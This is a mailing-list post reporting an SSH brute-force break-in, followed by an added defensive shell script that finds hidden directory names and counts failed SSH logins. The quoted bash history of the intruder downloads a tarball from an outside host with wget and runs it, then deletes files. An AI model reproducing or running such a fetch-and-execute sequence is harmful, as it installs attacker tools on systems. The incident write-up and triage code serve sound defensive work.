
[K12OSN] OT: Break-In report



I thought you guys might be interested in seeing the tracks of a computer break-in. I won't say whose system it was (to protect the embarrassed), but the break-in was nothing but a brute-force ssh attempt at guessing usernames and passwords. A regular user account was compromised and here is his bash history:

ls
cd who
ls
exit
w
cd /var/tmp
ls -a
cd " mkdir " "
cd " "
wget quest.dif.jp/x.tgz
tar zxvf x.tgz
cd x
./start dbdb
cd ..
ls -a
rm -rf *
passwd
ls -a
ps aux
ps aux | grep dan  (note: the hacked user account was "dan")
top
who
exit

I particularly like the use of " " as a directory name. Nice and invisible. Also note that the invader put his files in two directories which have the "sticky" bit set: /dev/shm and /var/tmp

In the end, it seems that all the invader succeeded in doing was a bunch of port-scanning. The OS is going to be re-installed anyway, just to be safe.

Are there any organizations out there that this should be reported to? (For instance, the way one might send reports to an antivirus group or a content filtering group).

-Rob
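Two checks that follow from Rob's report, written up as an added example (this is not code from the post or from the K12OSN list, and the paths, the sample directory tree and the sample auth.log lines are all constructed for illustration): a hunt through the sticky, world-writable directories for names like the " " directory that disappear in plain ls output, and a per-source tally of sshd "Failed password" lines to surface the password guessing that preceded the login.

```shell
#!/bin/sh
# Added post-incident triage helpers (example code, not from the original post).
# Two checks the history above suggests:
#   1. look inside the sticky, world-writable directories any user can write to
#      (/var/tmp, /dev/shm, /tmp) for names that vanish in 'ls' output, such as
#      the " " directory the intruder used;
#   2. count sshd "Failed password" lines per source address to spot the
#      brute-force guessing that preceded the login.
# The sample tree and the sample log lines below are constructed, not real data.

# List sticky + world-writable directories below a root.
# -perm -1002: the sticky bit (1000) and other-write (0002) both set.
sticky_world_writable() {
    find "$1" -xdev -type d -perm -1002 2>/dev/null
}

# Print entries up to two levels inside one directory whose basenames contain
# a space or a tab, or consist of three dots -- names that blend into 'ls'.
suspicious_names() {
    tab=$(printf '\t')
    find "$1" -mindepth 1 -maxdepth 2 \
        \( -name '* *' -o -name "*${tab}*" -o -name '...' \) \
        2>/dev/null
}

# Run suspicious_names over every sticky world-writable directory under a root.
scan_sticky_dirs() {
    sticky_world_writable "$1" | while IFS= read -r d; do
        suspicious_names "$d"
    done
}

# Build a throwaway tree that mimics the layout in the report; prints its path.
make_sample_tree() {
    sample_root=$(mktemp -d)
    mkdir -p "$sample_root/var/tmp" "$sample_root/dev/shm" "$sample_root/home/dan"
    chmod 1777 "$sample_root/var/tmp" "$sample_root/dev/shm"
    mkdir "$sample_root/var/tmp/ " "$sample_root/var/tmp/ /x"   # the " " trick
    mkdir "$sample_root/dev/shm/..."                            # a second hiding name
    mkdir "$sample_root/var/tmp/build-cache"                    # benign neighbour
    printf '%s\n' "$sample_root"
}

# Constructed auth.log-style lines: three guesses and then a success from one
# address (against the "dan" account), one guess from another address.
SAMPLE_AUTH_LOG='Mar  3 02:11:01 box sshd[4120]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
Mar  3 02:11:03 box sshd[4122]: Failed password for invalid user oracle from 203.0.113.5 port 51236 ssh2
Mar  3 02:11:05 box sshd[4124]: Failed password for dan from 203.0.113.5 port 51240 ssh2
Mar  3 02:11:07 box sshd[4126]: Accepted password for dan from 203.0.113.5 port 51242 ssh2
Mar  3 02:12:00 box sshd[4130]: Failed password for root from 198.51.100.7 port 40000 ssh2'

# Read auth.log lines on stdin; print "count address", most attempts first.
failed_ssh_by_source() {
    grep 'sshd\[[0-9]*\]: Failed password' \
        | sed -n 's/.* from \([0-9.][0-9.]*\) port .*/\1/p' \
        | sort | uniq -c | sort -rn \
        | awk '{ print $1, $2 }'
}

# Demo on the constructed tree and log; 'sed -n l' makes the spaces visible.
demo_root=$(make_sample_tree)
echo "Hidden-looking names in sticky dirs:"
scan_sticky_dirs "$demo_root" | sed -n l
echo "Failed sshd logins by source:"
printf '%s\n' "$SAMPLE_AUTH_LOG" | failed_ssh_by_source
rm -rf "$demo_root"
```

On a real box run scan_sticky_dirs against / (it needs read access to the directories it walks) and feed /var/log/auth.log or /var/log/secure to failed_ssh_by_source; a source that shows many failures followed by an "Accepted password" line is the login worth pulling the bash history for.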

